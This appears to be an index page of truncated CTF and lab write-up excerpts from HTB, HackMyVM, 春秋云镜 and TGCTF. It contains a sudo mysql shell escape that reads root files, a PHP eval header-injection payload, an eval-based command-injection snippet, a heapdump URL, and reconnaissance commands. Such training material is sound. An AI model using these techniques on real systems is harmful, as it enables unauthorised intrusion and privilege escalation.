春秋云镜-Hospital
Description: In this scenario you play a penetration-testing engineer sent to assess the network security of a hospital. Your goal is to gain control of every server in order to evaluate the organisation's security posture. The range has 4 flags in total, spread across different hosts.
Tags: internal network penetration, Nacos, Shiro, Fastjson, Decrypt
Difficulty: easy
Internal address               Host or FQDN    Brief description
172.30.12.5                    Web01           Spring + Shiro
172.30.12.6                    Server02        Nacos
172.30.12.236, 172.30.54.179   Web03           Fastjson
172.30.54.12                   Web04           Grafana + PostgreSQL
flag1: entry point 172.30.12.5, starting with fscan
http://39.99.147.102/actuator/heapdump
Downloaded the heapdump file
春秋云镜-Initial
Information gathering
Check for the ThinkPHP 5.0.23 RCE
Write a webshell
Reverse shell
Got the first half of the flag
www-data@ubuntu-web01:/$ sudo mysql -e '\! cat /root/flag/f*'
sudo mysql -e '\! cat /root/flag/f*'
(ASCII-art flag banner, truncated)
...
TGCTF_web
AAA偷渡阴平
Web warm-up 1. A simple PHP quirk; my WAF is unbeatable! (bushi)
<?php
$tgctf2025=$_GET['tgctf2025'];
if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){
    //hint: look at your keyboard key by key and circle the symbols that are not filtered with a marker (bushi
    eval($tgctf2025);
}else{
    die('(╯‵□′)╯炸弹!•••*~●');
}
highlight_file(__FILE__);
Consider a parameterless (no-argument) function chain
?tgctf2025=eval(current(getallheaders()));
Or
...
HMVM-SingDanceRap
Port scan
Directory scan
┌──(root㉿kali)-[~/yiyi/vshell_4.9.3/v_linux_amd64]
└─# feroxbuster -u http://192.168.56.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --extensions php,html,js,txt ...
HMVM-Todd
┌──(root㉿kali)-[~]
└─# arp-scan -I eth2 -l
Interface: eth2, type: EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:15    (Unknown: locally administered)
192.168.56.100  08:00:27:86:23:49    PCS Systemtechnik GmbH
192.168.56.120  08:00:27:28:80:f3    PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts sc ...
Environment-variable injection to execute arbitrary commands
While doing NCTF 2022 on NSS I came across a very interesting challenge,
so I'm writing it down.
The source program is as follows
@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
...
HTB-EscapeTwo
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
HTB-Dog
A directory scan turned up an exposed .git; pulled it down with GitHacker
In the files directory I found what was probably another player's webshell; better not to use it directly.
robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: ht ...
HTB-Cypher
E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch>python dirsearch.py -u http://cypher.htb/

  _|. _ _  _  _  _ _|_    v0.4.3 by 鹏组安全
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714

Output File: E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch\repor ...
HTB-UnderPass
fscan only found ports 22, 80 and 110
Learned a new information-gathering trick
Management Information Base (MIB) data retrieved from the target host underpass.htb with the snmpwalk command
┌──(root㉿kali)-[~]
└─# snmpwalk -v1 -c public underpass.htb
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (11947193) ...